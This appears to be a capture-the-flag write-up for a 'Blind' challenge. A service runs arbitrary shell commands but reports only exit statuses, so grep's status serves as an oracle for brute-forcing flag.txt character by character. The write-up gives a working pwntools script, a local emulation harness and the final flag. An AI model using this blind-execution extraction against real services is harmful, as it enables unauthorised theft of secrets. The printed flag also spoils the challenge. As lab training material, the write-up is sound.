Blind [Misc]

Blind

nc challenges.tamuctf.com 3424

Recon

On connecting we get an Execute: prompt. The service runs whatever command we type, shows none of its output, and prints only the command's exit status: ls -la succeeds (0), while ls on a path that does not exist fails (2).

$ nc challenges.tamuctf.com 3424
Execute: ls -la
0
Execute: ls dlfdljfdlkf
2
Execute: ^C

That single exit status is a one-bit oracle. grep exits 0 when its pattern matches a line of the file and 1 when it does not, so we can test one guessed character at a time against flag.txt and brute-force the flag one character per confirmed prefix.

Solution

from pwn import *

s = remote("challenges.tamuctf.com", 3424)
a = "abcdefghijklmnopqrstuvwxyz_1234567890{}"

flag = "gigem{"

while flag[-1] != "}":
    for c in a:
        s.recvuntil(b"Execute:")
        _flag = flag + c
        # GNU egrep treats a '{' that does not start a valid interval as a literal,
        # so the brace in the prefix does not break the pattern here.
        s.sendline('egrep "{}" flag.txt'.format(_flag).encode())
        # The service prints only the exit status: 0 = match, 1 = no match
        rc = int(s.recvline().strip())
        if rc == 0:
            flag += c
            print(flag)
            break
    else:
        # No character in the alphabet extended the prefix; stop instead of looping forever
        raise RuntimeError("no candidate matched after " + flag)
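To check the approach offline, the following is an added example (not the original writeup's code) that emulates the service on the local machine: a constructed flag.txt is written to a temporary directory, a helper runs a shell command there and returns only its exit status, exactly like the Execute: prompt, and a generic recovery loop drives that oracle. Two details go beyond the script above: the candidate is passed with grep -F and shlex.quote so braces and other metacharacters are matched literally, and the loop raises instead of spinning forever when no character in the alphabet extends the prefix. SAMPLE_FLAG, run_and_get_status, make_local_oracle and recover_flag are names chosen here, not from the challenge.

```python
import os
import shlex
import subprocess
import tempfile

# Constructed sample flag for the local emulation; the real one lives only on the server.
SAMPLE_FLAG = "gigem{n0t_th3_r34l_fl4g}"
ALPHABET = "abcdefghijklmnopqrstuvwxyz_1234567890{}"


def run_and_get_status(command, cwd):
    """Emulate the service: run a shell command, drop its output, return only the exit status."""
    proc = subprocess.run(command, shell=True, cwd=cwd,
                          stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return proc.returncode


def make_local_oracle(flag):
    """Write flag.txt into a fresh temp dir and return (oracle, tmpdir).

    oracle(cmd) behaves like the remote Execute: prompt: it answers with an int exit status.
    """
    tmp = tempfile.mkdtemp()
    with open(os.path.join(tmp, "flag.txt"), "w") as f:
        f.write(flag + "\n")
    return (lambda cmd: run_and_get_status(cmd, tmp)), tmp


def recover_flag(oracle, prefix="gigem{", alphabet=ALPHABET, max_len=64):
    """Extend the known prefix one character at a time using only grep's exit status."""
    flag = prefix
    while not flag.endswith("}"):
        if len(flag) >= max_len:
            raise RuntimeError("no closing brace found within %d characters" % max_len)
        for c in alphabet:
            candidate = flag + c
            # -F: fixed-string match, so '{' and '}' are literal; -q: we only need the status.
            # shlex.quote keeps the candidate a single shell word whatever it contains.
            cmd = "grep -qF -- {} flag.txt".format(shlex.quote(candidate))
            if oracle(cmd) == 0:
                flag = candidate
                break
        else:
            # Every character in the alphabet returned a non-zero status: the alphabet is
            # incomplete (e.g. uppercase letters) or the file changed. Do not loop forever.
            raise RuntimeError("no character in the alphabet extends %r" % flag)
    return flag


if __name__ == "__main__":
    oracle, tmpdir = make_local_oracle(SAMPLE_FLAG)
    print("ls -la ->", oracle("ls -la"))
    print("grep for a wrong prefix ->", oracle("grep -qF -- gigem{z flag.txt"))
    print("recovered:", recover_flag(oracle))
```

Each confirmed character costs at most len(ALPHABET) queries, so a flag of length n needs on the order of 39n round trips; against the real service the oracle function would simply wrap the pwntools send/recv pair from the solution above.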

Flag

gigem{r3v3r53_5h3ll5}